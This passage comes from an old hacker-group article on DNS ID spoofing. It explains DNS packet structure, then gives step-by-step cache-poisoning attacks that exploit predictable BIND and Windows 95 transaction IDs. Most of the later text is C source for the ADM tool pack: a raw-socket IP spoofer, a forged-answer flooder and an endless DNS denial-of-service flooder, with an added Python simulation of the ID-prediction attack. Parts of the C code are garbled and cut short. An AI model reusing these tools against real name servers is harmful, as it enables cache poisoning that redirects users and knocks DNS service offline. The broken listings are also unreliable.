ns.internic.net will send back the IP of a name server which has authority over '31.in-addr.arpa'.

   [ns.internic.net]                                               [ns.bibi.com]
   198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53

Now ns.bibi.com will ask the same question of the DNS at 144.44.44.4:

   [ns.bibi.com]                                           [ns.for.com]
   111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53

And so on. The mechanism is nearly the same as the one used for name resolution.

--[1.2]-- DNS packet header

Here is the format of a DNS message:

   +---------------------------+---------------------------+
   |     ID (the famous :)     |          flags            |
   +---------------------------+---------------------------+
   |   numbers of questions    |    numbers of answer      |
   +---------------------------+---------------------------+
   |  number of RR authority   |number of supplementary RR |
   +---------------------------+---------------------------+
   |                                                       |
   \                       QUESTION                        \
   |                                                       |
   +-------------------------------------------------------+
   |                                                       |
   \                        ANSWER                         \
   |                                                       |
   +-------------------------------------------------------+
   |                                                       |
   \                 Stuff etc.. No matter                 \
   |                                                       |
   +-------------------------------------------------------+

--[1.3]-- Structure of DNS packets.

__ID__

The ID lets us identify each DNS packet. Exchanges between name servers go from port 53 to port 53, and there may be more than one request in flight at a time, so the ID is the only way to tell the different DNS requests apart. We'll talk about it later..

__flags__

The flags area is divided into several parts:

                 4 bits            3 bits (always 0)
                   |                   |
     [QR | opcode | AA| TC| RD| RA | zero | rcode ]
       |            |__|__|__|                |______ 4 bits
       |_ 1 bit          |
                       1 bit

QR = If the QR bit = 0, the packet is a question, otherwise it's an answer.
opcode = 0 for a standard query, 1 for an inverse query, and 2 for a server status request (we don't need to know all these modes).

AA = If it's equal to 1, the name server is giving an authoritative answer.

TC = Truncation. No matter for us.

RD = If this flag is set to 1, it means "Recursion Desired": for example, when bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the DNS to take care of the whole request itself.

RA = If it's set to 1, it means that recursion is available. This bit is set to 1 in the answer of a name server that supports recursion.

Zero = Here are three zeroes...

rcode = It contains the return code for the DNS request: 0 means "no error", 3 means "name error".

The remaining flag values don't have any importance for us.

DNS QUESTION:

Here is the format of a DNS question:

   +-----------------------------------------------------------------------+
   |                         name of the question                          |
   +-----------------------------------------------------------------------+
   |        type of question        |            type of query             |
   +--------------------------------+--------------------------------------+

The structure of the question is like this. Example: www.heike.com will be

   [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]

that is, each label is preceded by its length in one byte and the name ends with a zero byte. For an IP address the format remains the same; 44.33.88.123.in-addr.arpa would be:

   [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]

[note]: a compression format exists, but we won't cover it.

type of question:

Here are the values that we will use most of the time (there are many more, but these are the only relevant ones):

   name   value
   A    |   1   | IP Address (resolving a name to an IP)
   PTR  |  12   | Pointer (resolving an IP to a name)

type of query:

This field is really the query class (QCLASS in the RFC). For Internet data it is 1, which happens to be the same value as the A question type, so in the examples below both fields read 1; it is not a copy of the question type.
DNS ANSWER:

Here is the format of an answer (an RR):

   +------------------------------------------------------------------------+
   |                           name of the domain                           |
   +------------------------------------------------------------------------+
   |               type               |               class                 |
   +----------------------------------+-------------------------------------+
   |                          TTL (time to live)                            |
   +------------------------------------------------------------------------+
   |      resource data length        |                                     |
   |----------------------------------+                                     |
   |                            resource data                               |
   +------------------------------------------------------------------------+

name of the domain: The name of the domain the resource record refers to. The domain name is stored in the same way as in the question part: for the resolution request of www.heike.com, the "name of the domain" field will contain [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type: The type field is the same as the "type of question" in the question part of the packet.

class: The class field is equal to 1 for Internet data.

time to live: This field gives, in seconds, how long the information may live in the name server's cache.

resource data length: The length of the resource data; for example, if the resource data length is 4, the resource data is 4 bytes long.
resource data: here we put the IP, for example (at least in our case).

I will offer you a little example that explains this better. Here is what happens when ns.bibi.com asks ns.heike.com for www.heike.com's address:

   ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53     (Phear Heike ;)

   +---------------------------------+--------------------------------------+
   | ID = 1999                       | QR = 0  opcode = 0  RD = 1           |
   +---------------------------------+--------------------------------------+
   | numbers of questions = htons(1) | numbers of answers = 0               |
   +---------------------------------+--------------------------------------+
   | number of RR authoritative = 0  | number of supplementary RR = 0       |
   +---------------------------------+--------------------------------------+
   +------------------------------------------------------------------------+
   | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                 |
   +------------------------------------------------------------------------+
   | type of question = htons(1)     | type of query = htons(1)             |
   +---------------------------------+--------------------------------------+

That's it for the question. Now let's look at the answer of ns.heike.com:

   ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53

   +---------------------------------+---------------------------------------+
   | ID = 1999                       | QR=1  opcode=0  RD=1  AA=1  RA=1      |
   +---------------------------------+---------------------------------------+
   | numbers of questions = htons(1) | numbers of answers = htons(1)         |
   +---------------------------------+---------------------------------------+
   | number of RR authoritative = 0  | number of supplementary RR = 0        |
   +---------------------------------+---------------------------------------+
   +-------------------------------------------------------------------------+
   | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                  |
   +-------------------------------------------------------------------------+
   | type of question = htons(1)     | type of query = htons(1)              |
   +-------------------------------------------------------------------------+
   +-------------------------------------------------------------------------+
   | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                    |
   +-------------------------------------------------------------------------+
   | type = htons(1)                 | class = htons(1)                      |
   +-------------------------------------------------------------------------+
   | time to live = 999999                                                   |
   +-------------------------------------------------------------------------+
   | resource data length = htons(4) | resource data = inet_addr("31.33.7.44")|
   +-------------------------------------------------------------------------+

Yah! That's all for now :))

Here is an analysis. In the answer:

   QR = 1 because it's an answer :)
   AA = 1 because the name server has authority over its domain
   RA = 1 because recursion is available

Good =) I hope you understood that, because you will need it for what follows.

--[2.0]-- DNS ID hack/spoof

Now it's time to explain clearly what DNS ID hacking/spoofing is.
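The question and answer just walked through, and the single check that the next section goes on to attack, in working code. This is an added example, not code from the article or from the ADM pack: the label encoder, the header packing and the parser follow the layouts above (compression pointers and the authority/additional sections are left out, as the article leaves them out), while the `Resolver` class, the `sequential_ids` counter and the names rand.dede.com / www.microsoft.com are my own constructions that mirror the BIND behaviour and the scenario the article describes in section 2.0.

```python
"""DNS wire format and the transaction-ID check a resolver relies on (added example)."""
import struct

TYPE_A, TYPE_PTR, CLASS_IN = 1, 12, 1


def encode_name(name):
    """'www.heike.com' -> b'\\x03www\\x05heike\\x03com\\x00', the [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] form."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def reverse_name(ip):
    """'31.33.7.44' -> '44.7.33.31.in-addr.arpa', the name used for a PTR lookup."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"


def decode_name(buf, off):
    """Read labels at buf[off:]; returns (name, offset past the terminating 0). No compression."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer not supported")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(qid, name, qtype=TYPE_A):
    """12-byte header (ID, flags, QD, AN, NS, AR) + one question. Flags 0x0100 = QR 0, opcode 0, RD 1."""
    return struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def build_answer(qid, name, ip, ttl=999999):
    """Authoritative answer: flags 0x8580 = QR 1, AA 1, RD 1, RA 1; question echoed; one A RR, RDLENGTH 4."""
    question = encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)
    rdata = bytes(int(o) for o in ip.split("."))
    rr = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return struct.pack("!HHHHHH", qid, 0x8580, 1, 1, 0, 0) + question + rr


def parse(pkt):
    """Header fields plus the question and answer sections; authority/additional are not parsed."""
    qid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)   # render A RDATA as dotted quad
        answers.append((name, rtype, ttl, rdata))
    return {"id": qid, "qr": flags >> 15, "opcode": (flags >> 11) & 0xF, "aa": (flags >> 10) & 1,
            "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1, "rcode": flags & 0xF,
            "questions": questions, "answers": answers}


class Resolver:
    """Toy caching name server (my model, not BIND). `next_id` hands out transaction IDs.
    An answer is accepted only if its ID matches an outstanding query for the same name;
    that match is the whole check a spoofed answer has to beat."""

    def __init__(self, next_id):
        self.next_id, self.pending, self.cache = next_id, {}, {}

    def query(self, name):
        qid = self.next_id()
        self.pending[qid] = name
        return build_query(qid, name)

    def receive(self, pkt):
        msg = parse(pkt)
        name = self.pending.get(msg["id"])
        if name is None or not msg["answers"] or msg["answers"][0][0] != name:
            return False                       # unknown ID or wrong name: dropped
        del self.pending[msg["id"]]
        self.cache[name] = msg["answers"][0][3]
        return True


def sequential_ids(start):
    """The BIND behaviour the article describes: random starting ID, then +1 per query."""
    state = [start]

    def nxt():
        qid = state[0]
        state[0] = (qid + 1) & 0xFFFF
        return qid
    return nxt


def id_prediction_attack(victim, target="www.microsoft.com", fake_ip="1.1.1.1", window=10):
    """ADMsnOOfID-style run: read the ID off a query the victim sends to a server we watch,
    make it query `target`, then flood spoofed answers carrying the next `window` IDs.
    The genuine answer is assumed to arrive later. Returns True if the fake record was cached."""
    probe = victim.query("rand.dede.com")      # we run ns.dede.com, so we see this ID
    observed = parse(probe)["id"]
    victim.query(target)                       # victim now asks the real ns.microsoft.com
    for offset in range(1, window + 1):
        victim.receive(build_answer((observed + offset) & 0xFFFF, target, fake_ip))
    return victim.cache.get(target) == fake_ip
```

With `sequential_ids` the flood lands on the first try; feed `Resolver` an unpredictable ID source instead and the same ten-packet window hits one ID in 65536 per answer, which is the whole of the fix that was available for this class of bug.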
Like I explained before, the only way for the DNS daemon to tell the different questions/answers apart is the ID field in the packet. Look at this example:

   ns.bibi.com:53 ----->[?www.heike.com] ------> ns.heike.com:53

So you only have to spoof the IP of ns.heike.com and deliver your false answer to ns.bibi.com before ns.heike.com does!

   ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
        |
        |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com

But in practice you have to guess the right ID :) If you are on the LAN, you can sniff to get this ID and answer before the name server (it's easy on a local network :)

If you want to do this remotely you don't have a lot of choices; there are only 4 basic methods:

1.) Try all the possible values of the ID field. You must answer before the NS (ns.heike.com in this example). This method is hopeless unless you have some way of learning the ID, or some other condition that makes it predictable.

2.) Send a batch of DNS requests (200 or 300) in order to increase the chances of hitting the right ID.

3.) Flood the DNS to keep it from doing its work. The name server will crash and show the following error:

   >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT

at which point the named daemon is out of order :)

4.) Or you can use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.), ID prediction (we will discuss this in a bit).

##################### Windows ID Vulnerability ###########################

I found a heavy vulnerability in Windows 95 (I haven't tested it on WinNT). Let's imagine my little friend is on Windows 95. Windows IDs are extremely easy to predict because the ID is "1" by default :))) and "2" for the second question (if there are 2 questions at the same time).

######################## BIND Vulnerability ##############################

There is a vulnerability in BIND (discovered by SNI, as stated earlier). In fact, DNS IDs are easily predictable: you only have to watch one query from the DNS in order to do what you want.
Let me explain... The DNS picks a random ID at start-up, but it only increments this ID for the following questions... =))) It's easy to exploit this vulnerability. Here is the way:

1. Be able to sniff the messages that come to a DNS you control (ns.dede.com in this sample).

2. You ask ns.victim.com to resolve (random).dede.com. ns.victim.com will ask ns.dede.com to resolve (random).dede.com:

   ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com

3. Now you have the ID of the message from ns.victim.com, so you know which ID range you'll have to use (ID = 444 in this sample).

4. You then make your resolution request, e.g. www.microsoft.com, to ns.victim.com:

   (you)         ---> [?www.microsoft.com]          ---> ns.victim.com
   ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com

5. Flood the name server ns.victim.com with answers carrying the ID (444) you already have, and then keep increasing it:

   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com

(now you know that DNS IDs are predictable, and they only increase. You flood ns.victim.com with spoofed answers, with the source address of ns.microsoft.com, carrying IDs 444+ ;)

*** ADMsnOOfID does this.

There is another way to exploit this vulnerability without root on any DNS. The mechanism is very simple. Here is the explanation:

We send ns.victim.com a resolution request for *.provnet.fr:

   (you) ----------[?(random).provnet.fr] -------> ns.victim.com

Then ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. There is nothing new here, but the interesting part begins here.
From this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr's IP as source) carrying IDs from 100 to 110...

   (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
   (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
   (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
   (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
   .....

After that, we ask ns.victim.com whether (random).provnet.fr has an IP. If ns.victim.com gives us an IP for (random).provnet.fr, then we have found the correct ID :) Otherwise we have to repeat this attack until we find the ID. It's a bit long but it's effective. And nothing forbids you from doing this with friends ;)

This is how ADMnOg00d works ;)

-------------------------------

##########################################################################

Here you will find 5 programs

   ADMkillDNS  - very simple DNS spoofer
   ADMsniffID  - sniff a LAN and reply with false DNS answers before the NS
   ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS)
   ADMnOg00d   - a DNS ID predictor (no need to be root on a NS)
   ADMdnsfuckr - a very simple denial of service attack to disable DNS

Have fun!! :)

Note: You can find source and binaries of these progs at ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which will be on janova. You need to install libpcap on your machine before compiling the ADMID proggies :)

ADM Crew.

Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love these guys)

Special Thanks: ackboo, and of course Secure Networks, Inc.
(SNI) at www.secnet.com for finding the vulnerability =)

<++> ADMIDpack/ADM-spoof.c
/************************************************************************/
/*                 ADM spoofing routine for spoof udp                   */
/************************************************************************/

#define IPHDRSIZE  sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "ip.h"
#include "udp.h"

/*****************************************************************************/
/*
 * in_cksum --
 *      Checksum routine for Internet Protocol family headers (C Version)
 */
/*****************************************************************************/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;                          /* truncate to 16 bits */
    return(answer);
}

/* Build an IP+UDP datagram with an arbitrary source address and push it
 * out through a raw socket (IP_HDRINCL set by the caller). */
int udp_send(s, saddr, daddr, sport, dport, datagram, datasize)
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char *datagram;
unsigned datasize;
{
    struct sockaddr_in sin;
    struct iphdr *ip;
    struct udphdr *udp;
    unsigned char *data;
    unsigned char packet[4024];
    int x;

    ip = (struct iphdr *)packet;
    udp = (struct udphdr *)(packet + IPHDRSIZE);
    data = (unsigned char *)(packet + IPHDRSIZE + UDPHDRSIZE);

    memset(packet, 0, sizeof(packet));

    udp->source = htons(sport);
    udp->dest = htons(dport);
    udp->len = htons(UDPHDRSIZE + datasize);
    udp->check = 0;                 /* UDP checksum left at zero (optional over IPv4) */

    memcpy(data, datagram, datasize);

    memset(packet, 0, IPHDRSIZE);
    ip->saddr.s_addr = saddr;       /* spoofed source goes straight into the header */
    ip->daddr.s_addr = daddr;
    ip->version = 4;
    ip->ihl = 5;
    ip->ttl = 245;
    ip->id = random() % 5985;
    ip->protocol = IPPROTO_UDP;
    ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
    ip->check = 0;
    ip->check = in_cksum((char *)packet, IPHDRSIZE);

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = daddr;
    sin.sin_port = udp->dest;

    x = sendto(s, packet, IPHDRSIZE + UDPHDRSIZE + datasize, 0,
               (struct sockaddr *)&sin, sizeof(struct sockaddr));
    return(x);
}

/*****************************************************************************/
/*                              RECV PAKET                                   */
/*             get_pkt(socket, *buffer , size of the buffer);                */
/*****************************************************************************/
int get_pkt(s, data, size)
int s;
unsigned char *data;
int size;
{
    struct sockaddr_in sin;
    int len, resu;

    len = sizeof(sin);
    resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len);
    return resu;
}
<-->

<++> ADMIDpack/ADMDNS2.c
/*************************************************/
/*  DNS include for play with DNS packet (c) ADM */
/*************************************************/

#define ERROR      -1
#define DNSHDRSIZE 12
#define TYPE_A     1
#define TYPE_PTR   12

/* small random offset, 1..150, used for IDs and source ports */
int myrand()
{
    int j;
    j = 1 + (int)(150.0 * rand() / (RAND_MAX + 1.0));
    return(j);
}

unsigned long host2ip(char *serv)
{
    struct sockaddr_in sinn;
    struct hostent *hent;

    hent = gethostbyname(serv);
    if (hent == NULL)
        return 0;
    bzero((char *)&sinn, sizeof(sinn));
    bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

/* Turn "www.heike.com" into the [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] label form */
void nameformat(char *name, char *QS)
{
    /* CRAP & LAme COde :) */
    char lol[3000];
    char tmp[2550];
    char tmp2[2550];
    int i, a = 0;

    bzero(lol, sizeof(lol));
    bzero(tmp, sizeof(tmp));
    bzero(tmp2, sizeof(tmp2));
    for (i = 0; i
/*
 * The listing is cut here in this copy: the rest of nameformat(), the
 * makepaketQS() / makepaketAW() builders for the question and answer
 * sections, and the opening of sendquestion() are missing. From the call
 * sites in dnsspoof() below, sendquestion() takes
 * (u_long s_ip, u_long d_ip, char *name, int type) and sets up dns, data,
 * buff and the raw socket sraw exactly as sendawnser() does. It resumes
 * at the point where the DNS header is filled in:
 */
    dns->id = 6000 + myrand();
    dns->qr = 0;
    dns->rd = 1;
    dns->aa = 0;
    dns->que_num = htons(1);
    dns->rep_num = htons(0);
    i = makepaketQS(data, name, type);
    udp_send(sraw, s_ip, d_ip, 1200 + myrand(), 53, buff, DNSHDRSIZE + i);
    close(sraw);
}

/* Send one spoofed answer: source s_ip (the impersonated NS), dest d_ip
 * (the victim NS), carrying transaction ID `ID` and mapping name -> spoofip */
void sendawnser(u_long s_ip, u_long d_ip, char *name, char *spoofip, int ID, int type)
{
    struct dnshdr *dns;
    char buff[1024];
    char *data;
    int i;
    int on = 1;
    int sraw;

    if ((sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    dns = (struct dnshdr *)buff;
    data = (char *)(buff + DNSHDRSIZE);
    bzero(buff, sizeof(buff));

    dns->id = htons(ID);
    dns->qr = 1;
    dns->rd = 1;
    dns->aa = 1;
    dns->que_num = htons(1);
    dns->rep_num = htons(1);

    i = makepaketAW(data, name, spoofip, type);
    printf(" I apres Makepaket == %i \n", i);
    udp_send(sraw, s_ip, d_ip, 53, 53, buff, DNSHDRSIZE + i);
    close(sraw);
}

/* Fire a few questions at the victim, then flood it with answers whose
 * IDs start at `ID` and count upward (the BIND sequential-ID weakness) */
void dnsspoof(char *dnstrust, char *victim, char *spoofname, char *spoofip, int ID, int type)
{
    struct dnshdr *dns;
    char buff[1024];
    char *data;
    u_long fakeip;
    u_long trustip;
    u_long victimip;
    int loop, rere;

    dns = (struct dnshdr *)buff;
    data = (char *)(buff + DNSHDRSIZE);

    trustip = host2ip(dnstrust);
    victimip = host2ip(victim);
    fakeip = host2ip("12.1.1.0");

    /* send question ... */
    if (type == TYPE_PTR)
        for (loop = 0; loop < 4; loop++)
            sendquestion(fakeip, victimip, spoofip, type);
    if (type == TYPE_A)
        for (loop = 0; loop < 4; loop++)
            sendquestion(fakeip, victimip, spoofname, type);

    /* now its time to awnser Quickly !!! */
    for (rere = 0; rere < 2; rere++) {
        for (loop = 0; loop < 80; loop++) {
            printf("trustip %s,victimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
                   dnstrust, victim, spoofname, spoofip, ID + loop, type);
            sendawnser(trustip, victimip, spoofname, spoofip, ID + loop, type);
        }
    }
}
<-->

<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */

#define DNSHDRSIZE 12
#define VERSION    "0.2 pub"
#define ERROR      -1

#include <stdio.h>
#include <stdlib.h>
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

void main(int argc, char **argv)
{
    struct dnshdr *dns;
    char *data;
    char buffer2[4000];
    unsigned char namez[255];
    unsigned long s_ip;
    unsigned long d_ip;
    int sraw, on = 1;

    if (argc < 2) {
        printf(" usage : %s [dns host]\n", argv[0]);
        exit(0);
    }

    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2 + 12);
    bzero(buffer2, sizeof(buffer2));

    if ((sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n", VERSION);
    printf("(c) ADM, Heike - yeah, everything that's mine is hers too ...\n");
    sleep(1);

    s_ip = host2ip("100.1.2.3");
    d_ip = host2ip(argv[1]);

    dns->id = 123;
    dns->rd = 1;
    dns->que_num = htons(1);

    /* endless stream of bogus PTR questions, each from the next source IP */
    while (1) {
        sprintf(namez, "\3%d\3%d\3%d\3%d\07in-addr\04arpa",
                myrand(), myrand(), myrand(), myrand());
        printf("%s\n", namez);
        strcpy(data, namez);
        *((u_short *)(data + strlen(namez) + 1)) = ntohs(12);   /* QTYPE  = PTR */
        *((u_short *)(data + strlen(namez) + 3)) = ntohs(1);    /* QCLASS = IN */
        udp_send(sraw, s_ip, d_ip, 2600 + myrand(), 53, buffer2, 14 + strlen(namez) + 5);
        s_ip = ntohl(s_ip);
        s_ip++;
        s_ip = htonl(s_ip);
    }
}
<-->

<++> ADMIDpack/ADMkillDNS.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

#define ERROR      -1
#define VERSION    "0.3 pub"
#define ID_START   1
#define ID_STOP    65535
#define PORT_START 53
#define PORT_STOP  54

void main(int argc, char **argv)
{
    struct dnshdr *dns;
    char *data;
    char buffer2[4000];
    unsigned char namez[255];
    unsigned long s_ip, s_ip2;
    unsigned long d_ip, d_ip2;
    int sraw, i, on = 1, x, loop, idstart, idstop, portstart, portstop;

    if (argc < 5) {
        system("/usr/bin/clear");
        printf(" usage : %s [ip src] [ip dst] [name] [ip]\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n", argv[0]);
        printf(" ip src: ip source of the dns anwser\n");
        printf(" ip dst: ip of the dns victim\n");
        printf(" name  : spoof name ex: www.dede.com\n");
        printf(" ip    : the ip associate with the name\n");
        printf(" options \n");
        printf(" [A,B,N] \n");
        printf("   A: flood the DNS victim with multiple query\n");
        printf("   B: DOS attack for destroy the DNS \n");
        printf("   N: None attack \n\n");
        printf(" [ID_START] \n");
        printf("   ID_START: id start :> \n\n");
        printf(" [ID_STOP] \n");
        printf("   ID_STOP : id stop :> \n\n");
        printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n");
        printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n", VERSION);
        exit(ERROR);
    }

    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2 + DNSHDRSIZE);
    bzero(buffer2, sizeof(buffer2));

    if ((sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    printf("ADMkillDNS %s", VERSION);
    printf("\nwell, I dedicate this to my Heike");
    printf("\nREADY FOR ACTION!\n");

    s_ip2 = s_ip = host2ip(argv[1]);
    d_ip2 = d_ip = host2ip(argv[2]);

    /* option A: make the victim open several queries for the name first */
    if (argc > 5)
        if (*argv[5] == 'A') {
            for (loop = 0; loop < 10; loop++) {
                dns->id = 6000 + loop;
                dns->qr = 0;
                dns->rd = 1;
                dns->aa = 0;
                dns->que_num = htons(1);
                dns->rep_num = htons(0);
                i = makepaketQS(data, argv[3], TYPE_A);
                udp_send(sraw, s_ip, d_ip, 1200 + loop, 53, buffer2, DNSHDRSIZE + i);
                s_ip = ntohl(s_ip);
                s_ip++;
                s_ip = htonl(s_ip);
            }
        }
    /* end of DNS
flood query */ /* ici on trouve la routine contre un DOS */ if(argc>5)if(*argv[5]=='B') { s_ip=host2ip("100.1.2.3"); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); printf("plz enter the number of packet u wanna send\n"); scanf("%i",&i); for(x=0;x 6 )idstart = atoi(argv[6]); else idstart = ID_START; if(argc > 7 )idstop = atoi(argv[7]); else idstop = ID_STOP; if(argc > 8 ){ portstart = atoi(argv[8]); portstop = atoi(argv[9]); } else { portstart = PORT_START; portstop = PORT_STOP; } bzero(buffer2,sizeof(buffer2)); bzero(namez,sizeof(namez)); i=0; x=0; s_ip=s_ip2; d_ip=d_ip2; for(;idstartid = htons(idstart); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop); i=makepaketAW(data,argv[3],argv[4],TYPE_A); for(;x < portstop; x++) udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i); x = portstart; } printf(" terminated..\n"); } <--> <++> ADMIDpack/ADMnOg00d.c /***************************/ /* ADMnog00d (c) ADM */ /***************************/ /* ADM DNS ID PREDICTOR */ /***************************/ #include #include #include "dns.h" #include "ADM-spoof.c" #include "ADMDNS2.c" #define VERSION "0.7 pub" #define SPOOFIP "4.4.4.4" #define ERROR -1 #define LEN sizeof(struct sockaddr) #define UNDASPOOF "111.111.111.111" #define TIMEOUT 300 #define DNSHDRSIZE 12 void usage() { printf(" ADMnoG00D [ID] \n"); printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n"); printf(" well... 
